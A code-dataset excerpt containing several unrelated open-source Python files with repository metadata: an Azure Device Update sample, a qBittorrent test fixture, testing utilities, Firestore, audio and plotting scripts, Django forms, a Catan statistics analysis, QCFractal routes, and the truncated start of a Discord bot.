0\n\n while not update_found and counter <= 6:\n response = self._client.devices.get_group_best_updates(group_id)\n group_devices = list(response)\n for updatableDevices in group_devices:\n update = updatableDevices.update_id\n if update.provider == provider and update.name == name and update.version == version:\n update_found = True\n if is_compliant:\n if updatableDevices.device_count == 0:\n print(\"All devices within the group have this update installed.\")\n else:\n print(f\"There are still {updatableDevices.device_count} devices that can be updated to \" +\n f\"update {provider}/{name}/{version}.\")\n else:\n print(f\"There are {updatableDevices.device_count} devices that can be updated to update \" +\n f\"{provider}/{name}/{version}.\")\n counter = counter + 1\n if not update_found:\n print(\".\", end=\"\", flush=True)\n time.sleep(DEFAULT_RETRY_AFTER)\n\n if not update_found:\n print(\"(Update is still not available for any group device.)\")\n print()\n\n def _deploy_update_step(self, provider, name, version, group_id):\n print(\"Deploying the update to a device...\")\n deployment_id = f\"{self._device_id}.{version.replace('.', '-')}\"\n _ = self._client.deployments.create_or_update_deployment(\n deployment_id=deployment_id,\n deployment=Deployment(\n deployment_id=deployment_id,\n deployment_type=DeploymentType.complete,\n start_date_time=datetime.now(timezone.utc),\n device_group_type=DeviceGroupType.DEVICE_GROUP_DEFINITIONS,\n device_group_definition=[group_id],\n update_id=UpdateId(provider=provider, name=name, version=version)))\n print(f\"Deployment '{deployment_id}' created.\")\n time.sleep(DEFAULT_RETRY_AFTER)\n\n print(\"Checking the deployment status...\")\n status = self._client.deployments.get_deployment_status(deployment_id)\n print(f\" {status.deployment_state}\")\n print()\n return deployment_id\n\n def _check_device_updates_step(self, provider, name, version):\n print(f\"Checking device {self._device_id} status...\")\n print(\"Waiting for the update to be installed...\")\n repeat = True\n while repeat:\n device = self._client.devices.get_device(self._device_id)\n installed_update = device.installed_update_id\n if installed_update.provider == provider and installed_update.name == name and installed_update.version == version:\n repeat = False\n else:\n print(\".\", end=\"\", flush=True)\n time.sleep(DEFAULT_RETRY_AFTER)\n\n print(\"\\n\")\n\n def _delete_update_step(self, provider, name, version):\n print(\"Deleting the update...\")\n _, _, headers = self._client.updates.delete_update(provider, name, version, cls=callback)\n operation_id = self._get_operation_id(headers[\"Operation-Location\"])\n print(f\"Delete operation id: {operation_id}\")\n\n print(\"Waiting for delete to finish...\")\n print(\"(this may take a minute or two)\")\n repeat = True\n while repeat:\n _, operation, headers = self._client.updates.get_operation(operation_id, cls=callback)\n if operation.status == \"Succeeded\":\n print(operation.status)\n repeat = False\n elif operation.status == \"Failed\":\n error = operation.errors[0]\n raise ImportError(\"Delete failed with response: \\n\" +\n json.dumps(error.__dict__, default=as_dict, sort_keys=True, indent=2))\n else:\n print(\".\", end=\"\", flush=True)\n time.sleep(self._get_retry_after(headers))\n print()\n\n def _get_operation_id(self, operation_location):\n return operation_location.split(\"/\")[-1]\n\n def _get_retry_after(self, headers):\n if headers is not None and headers[\"Retry-After\"] is not None:\n return int(headers[\"Retry-After\"])\n else:\n return DEFAULT_RETRY_AFTER\n\n def _output_test_data(self, version, job_id, deployment_id):\n print(\"Test data to use when running SDK unit tests:\")\n print(f'DEVICEUPDATE_TENANT_ID=\"{self._tenant_id}\"')\n print(f'DEVICEUPDATE_CLIENT_ID=\"{self._client_id}\"')\n print(f'DEVICEUPDATE_CLIENT_SECRET=\"{self._client_secret}\"')\n print(f'DEVICEUPDATE_ACCOUNT_ENDPOINT=\"{self._account_endpoint}\"')\n print(f'DEVICEUPDATE_INSTANCE_ID=\"{self._instance_id}\"')\n print(f'DEVICEUPDATE_VERSION=\"{version}\"')\n print(f'DEVICEUPDATE_OPERATION_ID=\"{job_id}\"')\n print(f'DEVICEUPDATE_DEVICE_ID=\"{self._device_id}\"')\n print(f'DEVICEUPDATE_DEPLOYMENT_ID=\"{deployment_id}\"')\n print(f'DEVICEUPDATE_PROVIDER=\"{MANUFACTURER}\"')\n print(f'DEVICEUPDATE_MODEL=\"{MODEL}\"')\n print(f'DEVICEUPDATE_DEVICE_CLASS_ID=\"b83e3c87fbf98063c20c3269f1c9e58d255906dd\"')\n print()\n print(\"Set these environment variables in your '.env' file before opening and running SDK unit tests.\")\n pass\n\n\ndef callback(response, value, headers):\n return response, value, headers\n\n\ndef as_dict(o):\n try:\n return o.__dict__\n except:\n return \"???\"\n","repo_name":"mirespace/python-azure","sub_path":"sdk/deviceupdate/azure-iot-deviceupdate/samples/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":12281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"9250022968","text":"import json\nimport subprocess\nimport tempfile\nimport time\nfrom pathlib import Path\n\nimport pytest\n\nfrom libtc import QBittorrentClient\n\nfrom .basetest import *\n\nQBITTORRENT_CONFIG = r\"\"\"[LegalNotice]\nAccepted=true\n\n[Network]\nCookies=@Invalid()\n\"\"\"\n\n\n@pytest.fixture(\n scope=\"module\",\n params=[\n True,\n False,\n ],\n)\ndef client(request):\n with tempfile.TemporaryDirectory() as tmp_path:\n tmp_path = Path(tmp_path)\n tmp_config_path = tmp_path / \"qBittorrent\" / \"config\" / \"qBittorrent_new.conf\"\n tmp_config_path.parent.mkdir(parents=True)\n with open(tmp_config_path, \"w\") as f:\n f.write(QBITTORRENT_CONFIG)\n\n p = subprocess.Popen([\"qbittorrent-nox\", f\"--profile={tmp_path!s}\"])\n client = QBittorrentClient(\n \"http://localhost:8080/\",\n \"admin\",\n \"adminadmin\",\n str(tmp_path / \"qBittorrent\"),\n )\n for _ in range(30):\n if client.test_connection():\n break\n time.sleep(0.1)\n else:\n p.kill()\n pytest.fail(\"Unable to start qbittorrent\")\n if request.param:\n client.label = \"testlabel\"\n if (\n \"create_subfolder_enabled\"\n in client.call(\"get\", \"/api/v2/app/preferences\").json()\n ):\n client.call(\n \"post\",\n \"/api/v2/app/setPreferences\",\n data={\"json\": json.dumps({\"create_subfolder_enabled\": request.param})},\n )\n yield client\n if (\n client.call(\"get\", \"/api/v2/app/preferences\").json()[\n \"create_subfolder_enabled\"\n ]\n != request.param\n ):\n pytest.fail(\"Settings were modified when they should not have been\")\n else:\n if request.param:\n torrent_content_layout = \"Original\"\n else:\n torrent_content_layout = \"NoSubfolder\"\n client.call(\n \"post\",\n \"/api/v2/app/setPreferences\",\n data={\n \"json\": json.dumps(\n {\"torrent_content_layout\": torrent_content_layout}\n )\n },\n )\n yield client\n p.kill()\n\n\ndef test_serialize_configuration(client):\n url = client.serialize_configuration()\n url, query = url.split(\"?\")\n assert url == \"qbittorrent+http://admin:adminadmin@localhost:8080/\"\n assert query.startswith(\"session_path=\")\n","repo_name":"JohnDoee/libtc","sub_path":"libtc/clients/tests/test_qbittorrent.py","file_name":"test_qbittorrent.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"31"} +{"seq_id":"7683216337","text":"from __future__ import (\n absolute_import,\n print_function,\n unicode_literals,\n )\n\nstr = None\n\n__metaclass__ = type\n__all__ = [\n \"check_network_namespace\",\n \"list_network_namespaces\",\n \"parse_ping_output\",\n \"retry\",\n \"synchronized\",\n \"wait_until\",\n ]\n\nimport datetime\nfrom functools import wraps\nimport re\nimport subprocess\nimport threading\nimport time\n\n\ndef retry(result_checker, num_attempts=4, delay=1):\n \"\"\"Retry calling the decorated function.\n\n :param result_checker: a callable returning True when the passed results\n means the call to the decorated function should be retried\n :param num_attempts: number of times to try before giving up\n :param delay: delay between retries in seconds\n \"\"\"\n def new_retry(func):\n @wraps(func)\n def func_retry(*args, **kwargs):\n attempts = 0\n while attempts < num_attempts - 1:\n result = func(*args, **kwargs)\n if not result_checker(result):\n return result\n else:\n time.sleep(delay)\n attempts += 1\n return func(*args, **kwargs)\n\n return func_retry\n\n return new_retry\n\n\ndef wait_until(predictate, timeout=60, timeout_msg='', delay=0.25):\n \"\"\"Wait until a predicate is true.\"\"\"\n start = datetime.datetime.utcnow()\n finish = start + datetime.timedelta(seconds=timeout)\n while datetime.datetime.utcnow() < finish:\n if predictate():\n return\n time.sleep(delay)\n raise Exception(\"Timed out %s\" % timeout_msg)\n\n\ndef list_network_namespaces():\n \"\"\"List the network namespaces.\"\"\"\n ns_list = subprocess.check_output(['sudo', 'ip', 'netns', 'list'])\n return ns_list.split()\n\n\ndef check_network_namespace(netns):\n \"\"\"Raise an exception if a network namespace doesn't exist.\"\"\"\n if netns not in list_network_namespaces():\n raise Exception(\"Namespace %s not in machine namespaces.\")\n\n\ndef parse_ping_output(ping_output):\n \"\"\"Parse ping output.\n\n Returns a tuple with the number of packets sent and the percentage of\n packet loss from a ping output.\"\"\"\n match = re.search(\n '(\\d*) packets transmitted, .* ([\\d\\.]*)\\% packet loss',\n ping_output)\n return match.groups() if match is not None else None\n\n\ndef synchronized(func):\n \"\"\"Decorator to make a function threadsafe.\"\"\"\n lock = threading.Lock()\n\n def wrap(*args, **kwargs):\n lock.acquire()\n try:\n return func(*args, **kwargs)\n finally:\n lock.release()\n return wrap\n","repo_name":"testiny/testiny","sub_path":"testiny/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27031404486","text":"import streamlit as st\nfrom google.cloud import firestore\nimport random\nimport string\nimport json\nfrom google.oauth2 import service_account\n\n# Authenticate to Firestore with the JSON account key.\ndb = firestore.Client.from_service_account_json(\"firestore-key.json\")\n\ndef guardar_datos(dato,user):\n\n #creamos un nombre unico\n name = ''.join(random.choices(string.ascii_letters, k=10))\n\n # Once the user has submitted, upload it to the database\n doc_ref = db.collection(\"users\").document(user)\n doc_ref.set({\n name:dato\n }, merge=True)\n\ndef buscar_datos(user):\n \n user_ref = db.collection(\"users\").document(user)\n\n user_Data = user_ref.get()\n user2 = user_Data.to_dict()\n\n if user2 is not None:\n # Sidebar para la búsqueda por título\n st.header(\"Filter by title\")\n filtro_titulo = st.text_input(\"Enter the title to search:\")\n \n categorias = ['Adult', 'Business/Corporate', 'Computers and Technology',\n 'E-Commerce', 'Education', 'Food', 'Forums', 'Games',\n 'Health and Fitness', 'Law and Government', 'News', 'Photography',\n 'Social Networking and Messaging', 'Sports', 'Streaming Services',\n 'Travel']\n\n # Sidebar para la búsqueda por categoría\n st.header(\"Filter by category\")\n filtro_categoria = st.multiselect(\"Select category\", categorias)\n\n # Filtrar datos por título y categoría\n datos_filtrados = [\n dato for dato_id, dato in user2.items() \n if filtro_titulo.lower() in dato.get(\"titulo\", \"\").lower() \n and (not filtro_categoria or dato.get(\"categoria\", \"\") in filtro_categoria)\n ]\n\n\n if datos_filtrados:\n # Mostrar los datos filtrados\n st.header(\"Filtered data\")\n count=10\n for item in datos_filtrados:\n if st.button(f\"Show description of {item['titulo']}, of the category: {item['categoria']}\",key=count ):\n st.subheader(\"Title:\")\n st.write(item['titulo'])\n st.subheader(\"Category:\")\n st.write(item['categoria'])\n st.subheader(\"Image:\")\n st.image(item['imagen'])\n st.subheader(\"Description:\")\n st.write(item[\"descripcion\"])\n st.subheader(\"LINK:\")\n st.write(item['link'])\n count+=1\n \n else: \n st.warning(\"No se encontraron datos para este usuario.\")\n \n \n else:\n st.warning(\"No se encontraron datos para este usuario.\")\n\nimport os\nimport firebase_admin\nfrom firebase_admin import credentials\n\nimport functools\n\ndef run_once(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n if not wrapper.has_run:\n func(*args, **kwargs)\n wrapper.has_run = True\n wrapper.has_run = False\n return wrapper\n\n@run_once\ndef funcion_a_ejecutar():\n cred = credentials.Certificate(\"firestore-key.json\")\n firebase_admin.initialize_app(cred)\n print(\"Esta función se ejecutará solo una vez.\")\n","repo_name":"Andvarjo/Link_Scrapper","sub_path":"frontend/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8183163592","text":"import os\nimport sys\nimport torchaudio\nfrom tqdm import tqdm\n\ndef resample_directory(input_directory, output_directory, new_sample_rate=16000):\n \"\"\"\n Resample all files in the provided directory and its subdirectories to a specified sample rate using torchaudio.\n The audio is truncated to 1 second clips and each clip is saved as a separate file.\n \"\"\"\n\n # Walk through input directory and its subdirectories\n all_files = [os.path.join(root, name) for root, dirs, files in os.walk(input_directory) for name in files]\n wav_files = [file for file in all_files if file.endswith(\".wav\")]\n for file_name in tqdm(wav_files, desc=\"Processing audio files\", unit=\"file\"):\n # Construct full file path\n input_file_path = file_name\n\n # Load the audio file\n waveform, sample_rate = torchaudio.load(input_file_path)\n\n # Check if the audio needs to be resampled\n if sample_rate != new_sample_rate:\n # Resample the audio\n resampler = torchaudio.transforms.Resample(orig_freq=sample_rate, new_freq=new_sample_rate)\n resampled_waveform = resampler(waveform)\n\n # Truncate to 1 second clips\n total_samples = resampled_waveform.shape[1]\n one_sec_samples = new_sample_rate\n\n for i in range(total_samples // one_sec_samples):\n start = i * one_sec_samples\n end = start + one_sec_samples\n\n # Construct the output file name\n output_file_name = f\"{os.path.splitext(os.path.basename(file_name))[0]}_clip_{i}.wav\"\n output_file_path = os.path.join(output_directory, output_file_name)\n\n # Save the 1-second clip to the output directory\n torchaudio.save(output_file_path, resampled_waveform[:, start:end], new_sample_rate, encoding=\"PCM_S\", bits_per_sample=16)\n\nif __name__ == '__main__':\n # Command line arguments: input_directory and output_directory\n if len(sys.argv) != 3:\n print(\"Usage: python resample_audio.py \")\n sys.exit(1)\n\n input_directory = sys.argv[1]\n output_directory = sys.argv[2]\n\n if not os.path.isdir(input_directory):\n print(\"Error: Invalid input directory\")\n sys.exit(1)\n \n if not os.path.exists(output_directory):\n os.makedirs(output_directory)\n\n # Resample all audio files in the input directory and save to the output directory\n resample_directory(input_directory, output_directory)\n","repo_name":"Naaafis/FewShot_MusicGen","sub_path":"Hydra/data/downsample.py","file_name":"downsample.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"18576532649","text":"\r\n#Import Python Libraries\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\nCO2 = pd.read_csv(\"https://raw.githubusercontent.com/kho777/data-visualization/master/data/CO2.csv\")\r\nhpi16= pd.read_excel(\"https://github.com/kho777/data-visualization/blob/master/data/hpi2016.xlsx?raw=true\",sheet_name='Sheet1', index_col=None, na_values=['NA'])\r\nCO2.head()\r\n\r\n# Using matplotlib\r\n\r\nCO2pc=CO2[\"CO2pc\"]\r\nplt.plot(CO2pc)\r\n\r\n# Scatterplot\r\n\r\nplt.scatter(\"Region\",\"Footprint\", data=hpi16)\r\n\r\nplt.xticks(rotation='vertical')\r\n\r\nplt.xticks(rotation=45)\r\n\r\n# Using Seaborn\r\n\r\nsns.regplot(x=\"GDPPC\",\r\n y=\"Footprint\",\r\n data=hpi16, fit_reg=False)\r\n\r\nsns.stripplot(x=\"Region\",\r\n y=\"Footprint\", \r\n data=hpi16);\r\n\r\nsns.swarmplot(x=\"Region\",\r\n y=\"Footprint\", \r\n data=hpi16);\r\n\r\n# Rotate the x labels\r\n# sns.boxplot\r\n# sns.violinplot\r\n# sns.barplot\r\n# sns.factorplot ","repo_name":"datageneration/dataprogramming","sub_path":"Python/examples/example3.py","file_name":"example3.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"40134620443","text":"black = [150, 179, 149, 152, 154]\norange = [162, 181, 151, 160, 170]\n\n\ndef classPhoto(black, orange):\n for student in black:\n if student not in blackUniforms:\n blackUniforms.append(student)\n \n for student in orange:\n if student not in orangeUniforms:\n orangeUniforms.append(student)\n \n return len(blackUniforms) == len(black) and len(orangeUniforms) == len(orange)\n \nprint(classPhoto(black, orange))\n","repo_name":"rodriguesmari/Python-Test","sub_path":"class_photo.py","file_name":"class_photo.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13759084280","text":"from allauth.account.forms import SignupForm\nfrom django import forms\nfrom . import models\n\n\nclass MyCustomSignupForm(SignupForm):\n\n first_name = forms.CharField(max_length=30, label='First Name', widget=forms.TextInput(\n attrs={'placeholder': 'First Name'}), required=True)\n last_name = forms.CharField(max_length=30, label='Last Name', widget=forms.TextInput(\n attrs={'placeholder': 'Last Name'}), required=True)\n phone = forms.CharField(max_length=20, label='Phone', widget=forms.TextInput(\n attrs={'placeholder': '+353 XX XXX XXXX'}), required=False)\n dob = forms.DateField(label=('DOB'), widget=forms.DateInput(\n format=('%d/%m/%Y'), attrs={'type': 'date'}), required=True)\n photo = forms.ImageField(label='Photo', required=False)\n\n def save(self, request):\n user = super(MyCustomSignupForm, self).save(request)\n user.first_name = self.cleaned_data['first_name']\n user.last_name = self.cleaned_data['last_name']\n user.phone = self.cleaned_data['phone']\n user.dob = self.cleaned_data['dob']\n user.photo = self.cleaned_data['photo']\n user.save()\n return user\n\n\nclass MyFamilioForm(forms.ModelForm):\n\n class Meta:\n model = models.Familio\n fields = ['email', 'level', 'kinship']\n\n\nclass MyGroupForm(forms.ModelForm):\n\n class Meta:\n model = models.Group\n fields = ['grp_name', 'familio']\n","repo_name":"Code-Institute-Submissions/p5_familio_app","sub_path":"member/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"25064433440","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 27 16:08:00 2021\n\n@author: alext\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport catan.read_games as r\n\nif __name__ == '__main__':\n \n games = r.read_all_games()\n \n #%%\n gcount = 0\n data = []\n for game in games:\n gcount += 1\n max_turns = len(game.turns) + 1\n for p in game.players.values():\n win = p.name == game.winner\n longest_road = p.longest_road\n largest_army = p.largest_army\n gained_longest_road = p.gained_longest_road\n lost_longest_road = p.lost_longest_road\n gained_largest_army = p.gained_largest_army\n lost_largest_army = p.lost_largest_army\n num_knights = 0\n for c in p.played_cards:\n if c == 'Knight':\n num_knights += 1\n \n row = [gcount, p.name, p.isbot, win, longest_road, largest_army, gained_longest_road,\n lost_longest_road, gained_largest_army, lost_largest_army, max_turns, num_knights, p.built['road']]\n data.append(row)\n \n df = pd.DataFrame(data = data, columns = ['gid', 'player', 'bot', 'winner', 'longest_road', 'largest_army',\n 'gained_lr', 'lost_lr', 'gained_la', 'lost_la', 'game_len',\n 'num_knights', 'num_road'])\n dfs = []\n for g, gdf in df.groupby('gid'):\n bot_game = False\n if np.any(gdf.bot):\n bot_game = True\n \n gdf['bot_game'] = bot_game\n dfs.append(gdf)\n \n df = pd.concat(dfs)\n \n botless_df = df[df.bot_game == False]\n \n #%%\n \n odds_with_lr = len(df[(df.longest_road) & (df.winner)])/len(df[df.longest_road])\n odds_with_la = len(df[(df.largest_army) & (df.winner)])/len(df[df.largest_army])\n \n \n botless_odds_with_lr = len(botless_df[(botless_df.longest_road) & (botless_df.winner)])/len(botless_df[botless_df.longest_road])\n botless_odds_with_la = len(botless_df[(botless_df.largest_army) & (botless_df.winner)])/len(botless_df[botless_df.largest_army])\n \n num_roads = df[df.longest_road].num_road.mean()\n \n #%%\n \n \n \n \n #%%\n data = []\n for g, gdf in df.groupby('gid'):\n lr_options = []\n for gained_lr in gdf.gained_lr:\n for i in gained_lr:\n lr_options.append(i)\n if lr_options:\n first_gained_lr = np.min(lr_options)\n else:\n first_gained_lr = 0\n \n la_options = []\n for gained_la in gdf.gained_la:\n for i in gained_la:\n la_options.append(i)\n if la_options:\n first_gained_la = np.min(la_options)\n else:\n first_gained_la = 0\n \n for rrow in gdf.iterrows():\n fg_la = first_gained_la in rrow[1].gained_la\n fg_lr = first_gained_lr in rrow[1].gained_lr\n ever_gained_la = len(rrow[1].gained_la) > 0\n ever_gained_lr = len(rrow[1].gained_lr) > 0\n \n datarow = [g, rrow[1].player, rrow[1].winner, fg_la, fg_lr, ever_gained_la, ever_gained_lr]\n data.append(datarow)\n \n ddf = pd.DataFrame(data = data, columns = ['gid', 'player', 'winner', 'fg_la', 'fg_lr', 'ever_gained_la', 'ever_gained_lr'])\n \n\n #%%\n \n data = []\n for g, gdf in df.groupby('gid'):\n lr_owner = None\n la_owner = None\n prev_turn = 0\n tot_turns = gdf.game_len.max()\n for i in np.arange(0,1.05,0.05):\n for _, row in gdf.iterrows():\n for t in row.gained_lr:\n if prev_turn < t < tot_turns * i:\n lr_owner = row.player\n \n for t in row.gained_la:\n if prev_turn < t < tot_turns * i:\n la_owner = row.player\n \n newrow = [g, row.player, i, lr_owner == row.player, la_owner == row.player, \n row.bot_game, row.winner, row.longest_road, row.largest_army]\n data.append(newrow)\n \n prev_turn = tot_turns * i\n \n dddf = pd.DataFrame(data = data, columns = ['gid', 'player', 'per_turn', 'lr', 'la', 'bot', 'winner', 'end_lr', 'end_la'])\n \n \n \n #%%\n data = []\n for g, gdf in dddf.groupby('per_turn'):\n if len(gdf[gdf.lr]):\n odds_win_lr = 100*len(gdf[(gdf.lr) & (gdf.winner)])/len(gdf[gdf.lr])\n odds_end_lr = 100*len(gdf[(gdf.lr) & (gdf.end_lr)])/len(gdf[gdf.lr])\n else:\n odds_win_lr = None\n odds_end_lr = None\n if len(gdf[gdf.la]):\n odds_win_la = 100*len(gdf[(gdf.la) & (gdf.winner)])/len(gdf[gdf.la])\n odds_end_la = 100*len(gdf[(gdf.la) & (gdf.end_la)])/len(gdf[gdf.la])\n else:\n odds_win_la = None\n odds_end_la = None\n \n \n \n \n row = [g*100, odds_win_lr, odds_win_la, odds_end_lr, odds_end_la, len(gdf[gdf.lr]), len(gdf[gdf.la])]\n data.append(row)\n \n odds_df = pd.DataFrame(data = data, columns = ['per_turn', 'odds_win_lr', 'odds_win_la', \n 'odds_end_lr', 'odds_end_la', 'num_lr', 'num_la'])\n \n\n \n \n #%%\n data = []\n for g, gdf in dddf[dddf.bot == False].groupby('per_turn'):\n if len(gdf[gdf.lr]):\n odds_win_lr = 100* len(gdf[(gdf.lr) & (gdf.winner)])/len(gdf[gdf.lr])\n odds_end_lr = 100*len(gdf[(gdf.lr) & (gdf.end_lr)])/len(gdf[gdf.lr])\n else:\n odds_win_lr = None\n odds_end_lr = None\n if len(gdf[gdf.la]):\n odds_win_la = 100*len(gdf[(gdf.la) & (gdf.winner)])/len(gdf[gdf.la])\n odds_end_la = 100*len(gdf[(gdf.la) & (gdf.end_la)])/len(gdf[gdf.la])\n else:\n odds_win_la = None\n odds_end_la = None\n \n \n \n \n row = [g*100, odds_win_lr, odds_win_la, odds_end_lr, odds_end_la, len(gdf[gdf.lr]), len(gdf[gdf.la])]\n data.append(row)\n \n botless_odds_df = pd.DataFrame(data = data, columns = ['per_turn', 'odds_win_lr', 'odds_win_la', \n 'odds_end_lr', 'odds_end_la', 'num_lr', 'num_la'])\n \n \n #%%\n \n fig, axs = plt.subplots(1,2)\n \n sns.lineplot(ax = axs[0], x = 'per_turn', y = 'odds_end_lr', data = odds_df[odds_df.num_lr > 20])\n sns.lineplot(ax = axs[0], x = 'per_turn', y = 'odds_end_lr', data = botless_odds_df[botless_odds_df.num_lr > 20])\n \n axs[0].set_title('Will You Finish with Longest Road?')\n axs[0].set_ylabel('Odds of Finishing with LR (%)')\n axs[0].set_xlabel('Percent of Game Completed')\n # plt.legend(['All Games', 'Human Only Games'])\n \n\n \n sns.lineplot(ax = axs[1], x = 'per_turn', y = 'odds_end_la', data = odds_df[odds_df.num_la > 20])\n sns.lineplot(ax = axs[1], x = 'per_turn', y = 'odds_end_la', data = botless_odds_df[botless_odds_df.num_la > 20])\n \n axs[1].set_title('Will You Finish with Largest Army?')\n axs[1].set_ylabel('Odds of Finishing with La (%)')\n axs[1].set_xlabel('Percent of Game Completed')\n plt.legend(['All Games', 'Human Only Games'])\n \n #%%\n fig, axs = plt.subplots(1,2)\n \n sns.lineplot(ax = axs[0], x = 'per_turn', y = 'odds_win_lr', data = odds_df[odds_df.num_lr > 20])\n sns.lineplot(ax = axs[0], x = 'per_turn', y = 'odds_win_lr', data = botless_odds_df[botless_odds_df.num_lr > 20])\n \n axs[0].set_title('Will You Win with Longest Road?')\n axs[0].set_ylabel('Odds of Winning with LR (%)')\n axs[0].set_xlabel('Percent of Game Completed')\n axs[0].axhline(25, color = 'r')\n\n \n sns.lineplot(ax = axs[1], x = 'per_turn', y = 'odds_win_la', data = odds_df[odds_df.num_la > 20])\n sns.lineplot(ax = axs[1], x = 'per_turn', y = 'odds_win_la', data = botless_odds_df[botless_odds_df.num_la > 20])\n \n axs[1].set_title('Will You Win with Largest Army?')\n axs[1].set_ylabel('Odds of Win with La (%)')\n axs[1].set_xlabel('Percent of Game Completed')\n axs[1].axhline(25, color = 'r')\n plt.legend(['All Games', 'Human Only Games'])\n","repo_name":"zanderman12/catan_breakdown","sub_path":"catan_breakdown/scripts/longest_road_largest_army_value.py","file_name":"longest_road_largest_army_value.py","file_ext":"py","file_size_in_byte":8339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"675957326","text":"from networktest import networktest\nimport sqlite3\nimport time\n\ntableinit = '''\nCREATE TABLE IF NOT EXISTS \"data\" (\n \"id\" integer NOT NULL PRIMARY KEY AUTOINCREMENT,\n \"name\" TEXT,\n \"tag\" TEXT,\n \"type\" TEXT\n);'''\nif __name__ == '__main__':\n sq = sqlite3.connect('./db.sqlite')\n c = sq.cursor()\n c.execute(tableinit)\n sq.close()\n # for i in range(0, 100):\n # try:\n # networktest()\n # except Exception as e:\n # print(e)\n\n ## 定时执行\n while True:\n try:\n networktest()\n # 距离下次爬虫间隔2小时\n time.sleep(60 * 60 * 2)\n except Exception as e:\n print(e)\n","repo_name":"fenyuluoshang/taobao_crawler","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13440389391","text":"from typing import List\n\nfrom flask import current_app, g\n\nfrom qcfractal.flask_app import storage_socket\nfrom qcfractal.flask_app.api_v1.blueprint import api_v1\nfrom qcfractal.flask_app.api_v1.helpers import wrap_route\nfrom qcportal.exceptions import LimitExceededError\nfrom qcportal.reaction import (\n ReactionDatasetSpecification,\n ReactionDatasetNewEntry,\n ReactionAddBody,\n ReactionQueryFilters,\n)\nfrom qcportal.utils import calculate_limit\n\n\n#####################\n# Record\n#####################\n\n\n@api_v1.route(\"/records/reaction/bulkCreate\", methods=[\"POST\"])\n@wrap_route(\"WRITE\")\ndef add_reaction_records_v1(body_data: ReactionAddBody):\n limit = current_app.config[\"QCFRACTAL_CONFIG\"].api_limits.add_records\n if len(body_data.stoichiometries) > limit:\n raise LimitExceededError(f\"Cannot add {len(body_data.stoichiometries)} reaction records - limit is {limit}\")\n\n return storage_socket.records.reaction.add(\n stoichiometries=body_data.stoichiometries,\n rxn_spec=body_data.specification,\n tag=body_data.tag,\n priority=body_data.priority,\n owner_user=g.username,\n owner_group=body_data.owner_group,\n find_existing=body_data.find_existing,\n )\n\n\n@api_v1.route(\"/records/reaction//components\", methods=[\"GET\"])\n@wrap_route(\"READ\")\ndef get_reaction_components_v1(record_id: int):\n return storage_socket.records.reaction.get_components(record_id)\n\n\n@api_v1.route(\"/records/reaction/query\", methods=[\"POST\"])\n@wrap_route(\"READ\")\ndef query_reaction_v1(body_data: ReactionQueryFilters):\n max_limit = current_app.config[\"QCFRACTAL_CONFIG\"].api_limits.get_records\n body_data.limit = calculate_limit(max_limit, body_data.limit)\n\n return storage_socket.records.reaction.query(body_data)\n\n\n#####################\n# Dataset\n#####################\n\n\n@api_v1.route(\"/datasets/reaction//specifications\", methods=[\"POST\"])\n@wrap_route(\"WRITE\")\ndef add_reaction_dataset_specifications_v1(dataset_id: int, body_data: List[ReactionDatasetSpecification]):\n return storage_socket.datasets.reaction.add_specifications(dataset_id, body_data)\n\n\n@api_v1.route(\"/datasets/reaction//entries/bulkCreate\", methods=[\"POST\"])\n@wrap_route(\"WRITE\")\ndef add_reaction_dataset_entries_v1(dataset_id: int, body_data: List[ReactionDatasetNewEntry]):\n return storage_socket.datasets.reaction.add_entries(\n dataset_id,\n new_entries=body_data,\n )\n","repo_name":"MolSSI/QCFractal","sub_path":"qcfractal/qcfractal/components/reaction/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"31"} +{"seq_id":"19072568729","text":"# discord.py\nimport discord\nfrom discord.ext import commands\nfrom discord.ui import Button, View\n\n# Other modules\nfrom json import JSONDecodeError\nfrom traceback import format_exception\nfrom datetime import datetime, timedelta\nfrom typing import Literal\nfrom datetime import timezone\nimport logging\nimport logging.handlers\nimport sys\n# Dependency imports\nfrom pytz import timezone as pytz_tz\nfrom datefinder import find_dates\nimport requests\n\n# Custom imports\nfrom database.management.connection import set_connections\nfrom discord_tools.modals import EventModal\nfrom utils.logger import define_log, StreamToLogger, exception_to_log\nfrom utils.ps2 import continent_to_id, name_to_server_ID\nfrom utils.timezones import get_IANA\nfrom utils.exit_handlers import main_exit_handler\nimport config as cfg\n# Discord Tools\nfrom discord_tools.classes import AlertReminder\nfrom discord_tools.data import alert_reminder_dict\nfrom discord_tools.embeds import get_server_panel, get_census_health, get_PS2_character_embed, event_embed\nfrom discord_tools.literals import Timezones\nfrom command_groups.genshin_commands import GenshinDB\nfrom discord_tools.tasks import update_genshin_chars\nfrom discord_tools.data import event_dict\nfrom discord.errors 